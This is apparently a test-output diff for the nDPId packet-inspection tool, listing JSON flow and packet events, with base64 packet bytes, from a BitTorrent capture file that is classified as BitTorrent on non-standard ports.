-00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="} +01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="} +01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="} +00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 